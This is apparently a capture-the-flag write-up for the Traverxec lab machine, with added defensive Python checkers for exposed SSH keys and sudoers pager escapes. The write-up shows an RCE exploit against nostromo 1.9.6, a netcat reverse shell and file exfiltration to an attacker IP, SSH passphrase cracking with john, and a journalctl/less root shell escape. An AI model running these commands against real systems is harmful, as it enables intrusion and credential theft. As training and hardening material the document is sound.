Step 1. Reconnaissance & Enumeration

nmap -Pn -n -p- -g 53 traverxec.htb --min-rate 1000 -oA port_scan
grep "open" port_scan.nmap | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//' > port_scan.txt
nmap -Pn -n -sC -sV -p `cat port_scan.txt` traverxec.htb -oA version_scan
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

A search for nostromo 1.9.6 exploits turns up a remote code execution vulnerability, CVE-2019-16278.

python cve2019_16278.py traverxec.htb 80 id
HTTP/1.1 200 OK
Date: Wed, 22 Apr 2020 11:17:05 GMT
Server: nostromo 1.9.6
Connection: close


uid=33(www-data) gid=33(www-data) groups=33(www-data)

In order to get a reverse shell we can use Netcat. Let’s start a Netcat listener on our local machine.

nc -lvp 6677
listening on [any] 6677 ...

Then execute the following command to get a shell.

python cve2019_16278.py traverxec.htb 80 "nc -e bash 10.10.16.18 6677"

Next, a TTY shell can be spawned using Python.

python -c 'import pty;pty.spawn("/bin/bash")'

Step 2. Lateral Movement

Let’s enumerate the system to find privilege escalation vectors. The /etc/passwd file reveals a user named david. It also shows that the Nostromo web root is /var/nostromo. The folder /var/nostromo/conf contains the web server configuration files.

The files nhttpd.conf and .htpasswd look interesting. The .htpasswd file contains a password hash, which is crackable, but the recovered password turns out to be of no use. The nhttpd.conf file contains the following configuration.

# MAIN [MANDATORY]

servername              traverxec.htb
serverlisten            *
serveradmin             david@traverxec.htb
serverroot              /var/nostromo
servermimes             conf/mimes
docroot                 /var/nostromo/htdocs
docindex                index.html

# LOGS [OPTIONAL]

logpid                  logs/nhttpd.pid

# SETUID [RECOMMENDED]

user                    www-data

# BASIC AUTHENTICATION [OPTIONAL]

htaccess                .htaccess
htpasswd                /var/nostromo/conf/.htpasswd

# ALIASES [OPTIONAL]

/icons                  /var/nostromo/icons

# HOMEDIRS [OPTIONAL]

homedirs                /home
homedirs_public         public_www

The HOMEDIRS section indicates that users may expose a public_www folder from their home directory. The home directory of david is not readable, but public_www is accessible. It contains a protected-file-area sub-folder.

ls -al /home/david/public_www/protected-file-area

Enumeration of the folder reveals a backup of SSH keys. Let’s transfer it to our box using netcat. Run the following command locally to receive the file.

nc -lvp 6688 > backup.tgz
listening on [any] 6688 ... 

Next, run the following command on the server to complete the transfer.

nc 10.10.16.18 6688 < /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz

Let’s extract the files inside backup-ssh-identity-files.tgz.

tar -xvf backup-ssh-identity-files.tgz

The archive contains SSH keys, among which the private key id_rsa can potentially be used to log in as david.

chmod 400 id_rsa
ssh -i id_rsa david@10.10.10.165

The authenticity of host 'traverxec.htb (10.10.10.165)' can't be established.
ECDSA key fingerprint is SHA256:CiO/pUMzd+6bHnEhA2rAU30QQiNdWOtkEPtJoXnWzVo.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'traverxec.htb,10.10.10.165' (ECDSA) to the list of known hosts.
Enter passphrase for key 'id_rsa':

However, the private key is encrypted and needs a passphrase. Let’s use john to try and crack it. First, extract the hash from the RSA key using ssh2john.

python3 /usr/share/john/ssh2john.py id_rsa > hash.txt

Next, crack it using john and the rockyou.txt wordlist.

john --wordlist=/home/root/Documents/rockyou.txt hash.txt
john --show hash.txt
id_rsa:hunter

Logging in as david with the recovered passphrase now succeeds and yields the user flag.
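Two things went wrong for the defender in this step: a backup of SSH key material was left under a web-served directory (public_www), and the passphrase protecting the key was weak enough to fall to rockyou.txt. The following added audit script (not from the write-up or from HTB) inspects private key files and reports both conditions. It parses the two on-disk formats OpenSSH uses (the "openssh-key-v1" container, whose header names the cipher and KDF, and the legacy PEM format, whose Proc-Type/DEK-Info headers signal encryption). The sample files, paths and blobs are constructed for the demo; the OpenSSH blobs are hand-built headers rather than real key pairs, which is all the checker reads.

```python
import base64
import re
import struct
from typing import Optional

MAGIC = b"openssh-key-v1\x00"
PEM_RE = re.compile(
    r"-----BEGIN ([A-Z ]+) PRIVATE KEY-----\n(.*?)-----END \1 PRIVATE KEY-----", re.S
)
# Path fragments that mean "served by the web server" (assumption: nostromo
# homedirs_public as in the write-up, plus common docroot names).
WEB_EXPOSED = ("/public_www/", "/htdocs/", "/www/")


def _ssh_string(b: bytes) -> bytes:
    """Encode bytes as an SSH wire 'string' (uint32 big-endian length + data)."""
    return struct.pack(">I", len(b)) + b


def _read_string(buf: bytes, off: int):
    """Decode an SSH wire 'string' at offset off; return (data, new_offset)."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def _openssh_blob(cipher: bytes, kdf: bytes, kdfopts: bytes) -> str:
    """Build a constructed openssh-key-v1 file with the given header fields."""
    body = MAGIC + _ssh_string(cipher) + _ssh_string(kdf) + _ssh_string(kdfopts)
    body += struct.pack(">I", 1) + b"\x00" * 32  # key count + dummy payload
    b64 = base64.b64encode(body).decode()
    lines = [b64[i:i + 70] for i in range(0, len(b64), 70)]
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n" + "\n".join(lines)
            + "\n-----END OPENSSH PRIVATE KEY-----\n")


# Constructed sample "files" (path -> content); none of these are real keys.
SAMPLE_FILES = {
    "/home/david/public_www/protected-file-area/backup/.ssh/id_rsa":
        _openssh_blob(b"aes256-ctr", b"bcrypt", _ssh_string(b"S" * 16) + struct.pack(">I", 16)),
    "/home/david/.ssh/id_ed25519": _openssh_blob(b"none", b"none", b""),
    "/home/david/.ssh/legacy_rsa":
        "-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
        "DEK-Info: AES-128-CBC,0011223344556677\n\nAAAA\n-----END RSA PRIVATE KEY-----\n",
    "/home/david/.ssh/id_rsa.pub": "ssh-rsa AAAA... david@traverxec\n",
}


def inspect_private_key(text: str) -> Optional[dict]:
    """Describe how a private key is protected, or return None if text is not one."""
    m = PEM_RE.search(text)
    if not m:
        return None
    label, body = m.group(1), m.group(2)
    if label == "OPENSSH":
        raw = base64.b64decode("".join(body.split()))
        if not raw.startswith(MAGIC):
            raise ValueError("OPENSSH block without openssh-key-v1 magic")
        cipher, off = _read_string(raw, len(MAGIC))
        kdf, off = _read_string(raw, off)
        kdfopts, off = _read_string(raw, off)
        rounds = None
        if kdf == b"bcrypt":               # kdfopts = string(salt) + uint32(rounds)
            _salt, o = _read_string(kdfopts, 0)
            (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
        return {"format": "openssh", "encrypted": cipher != b"none",
                "cipher": cipher.decode(), "kdf": kdf.decode(), "rounds": rounds}
    # Legacy PEM: encryption is signalled by header lines before the blank line.
    headers = body.split("\n\n", 1)[0] if "\n\n" in body else ""
    encrypted = "Proc-Type: 4,ENCRYPTED" in headers
    dek = re.search(r"DEK-Info: ([^,\s]+)", headers)
    return {"format": "pem", "encrypted": encrypted,
            "cipher": dek.group(1) if dek else "none",
            # OpenSSL derives the key with a single MD5 pass (EVP_BytesToKey)
            "kdf": "evp_bytestokey-md5" if encrypted else "none",
            "rounds": 1 if encrypted else None}


def audit_key_files(files: dict) -> list:
    """Return (path, severity, message) findings for private keys in files."""
    findings = []
    for path, text in files.items():
        info = inspect_private_key(text)
        if info is None:
            continue
        if any(seg in path for seg in WEB_EXPOSED):
            findings.append((path, "HIGH", "private key stored under a web-served directory"))
        if not info["encrypted"]:
            findings.append((path, "HIGH", "private key has no passphrase"))
        elif info["format"] == "pem":
            findings.append((path, "MEDIUM",
                             f"legacy PEM encryption ({info['cipher']}, single-pass MD5 KDF); fast to brute-force"))
        elif info["rounds"] is not None and info["rounds"] < 16:
            findings.append((path, "LOW", f"bcrypt rounds={info['rounds']}; regenerate with ssh-keygen -a 100"))
    return findings


if __name__ == "__main__":
    for path, sev, msg in audit_key_files(SAMPLE_FILES):
        print(f"{sev:6} {path}: {msg}")
```

Run against a real tree by replacing SAMPLE_FILES with a walk over the home directories. Note what the findings do not say: the web-exposed key in the sample is encrypted with a bcrypt KDF at the default 16 rounds and still gets a HIGH, because a passphrase only slows an offline attack down, and the write-up shows a dictionary word falling to john regardless of the KDF. The fix is to keep key material out of any served path, not to rely on the passphrase.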

Step 3. Privilege Escalation

The user’s home directory contains a folder called bin with the following contents.

cat server-stats.sh

#!/bin/bash
cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat

The last line is interesting because it executes journalctl via sudo. Let’s run the script to see the output.

./server-stats.sh

The script returns the last 5 lines of the nostromo service logs using journalctl. The script pipes that output through cat, which keeps journalctl from paging, but the same sudo command can be run without the pipe. When journalctl writes to a terminal it sends its output through the default pager, which is likely to be less. The less command displays the output on the user’s screen and waits for input once the content is displayed, and its prompt accepts shell commands.

/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service

The command above invokes less, after which shell commands can be run by prefixing them with !. Let’s try executing /bin/bash.

!/bin/bash

The execution succeeds and a root shell is spawned. The root flag is located in /root/.
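The sudo rule behind this step grants a binary that hands its output to an interactive pager, and the pager prompt is the shell escape. A review of sudoers rules should catch that pattern. The following added checker (not from the write-up or from HTB) parses sudoers-style rule lines, flags journalctl rules that lack --no-pager, and prints the hardened rule. The sudoers snippet is constructed: the box's real /etc/sudoers is not shown in the write-up, so the david rule is modelled on the command the script runs, and the other two lines are invented for contrast.

```python
import re
import shlex

# Constructed sudoers snippet for the demo (assumption: the box's actual rule is
# not shown in the write-up; the david line mirrors the command in server-stats.sh).
SAMPLE_SUDOERS = """\
# /etc/sudoers.d/nostromo (constructed sample)
Defaults env_reset
david ALL=(root) NOPASSWD: /usr/bin/journalctl -n5 -unostromo.service
www-data ALL=(root) NOPASSWD: /usr/bin/systemctl restart nostromo.service
alice ALL=(root) NOPASSWD: /usr/bin/journalctl --no-pager -n5 -unostromo.service
"""

# Commands that page their output to a terminal unless told not to, and the flag
# that disables it. A pager prompt (less) runs shell commands on "!", so a sudo
# rule for these without the flag is a root shell for the listed user.
PAGER_COMMANDS = {
    "journalctl": "--no-pager",
}

# user  host=(runas)  TAG: cmd, cmd ...   (Defaults and comment lines are skipped)
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*(\((?P<runas>[^)]*)\))?\s*"
    r"(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$"
)


def parse_sudoers(text: str) -> list:
    """Split sudoers rule lines into one record per command specification."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        for cmd in m.group("cmds").split(","):
            rules.append({
                "user": m.group("user"),
                "runas": m.group("runas") or "root",
                "tags": m.group("tags").strip(),
                "argv": shlex.split(cmd.strip()),
                "raw": line,
            })
    return rules


def audit_pager_escapes(text: str) -> list:
    """Flag rules whose command will page to a terminal; include a corrected rule."""
    findings = []
    for r in parse_sudoers(text):
        if not r["argv"]:
            continue
        name = r["argv"][0].rsplit("/", 1)[-1]
        flag = PAGER_COMMANDS.get(name)
        if flag and flag not in r["argv"][1:]:
            fixed_argv = [r["argv"][0], flag] + r["argv"][1:]
            tags = (r["tags"] + " ") if r["tags"] else ""
            fixed = f'{r["user"]} ALL=({r["runas"]}) {tags}{" ".join(fixed_argv)}'
            findings.append({
                "user": r["user"],
                "command": " ".join(r["argv"]),
                "reason": f"{name} pages to a terminal; the pager prompt is a shell escape",
                "fix": fixed,
            })
    return findings


if __name__ == "__main__":
    for f in audit_pager_escapes(SAMPLE_SUDOERS):
        print(f"{f['user']}: {f['command']}\n  {f['reason']}\n  suggested: {f['fix']}")
```

sudoers matches command arguments literally, so the hardened rule only works if the calling script is changed to the same argv: server-stats.sh would run /usr/bin/sudo /usr/bin/journalctl --no-pager -n5 -unostromo.service, and the old argument list would then be refused. The `| cat` in the script is not a control; it is a convenience the rule does not enforce, which is exactly the gap the write-up exploits.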
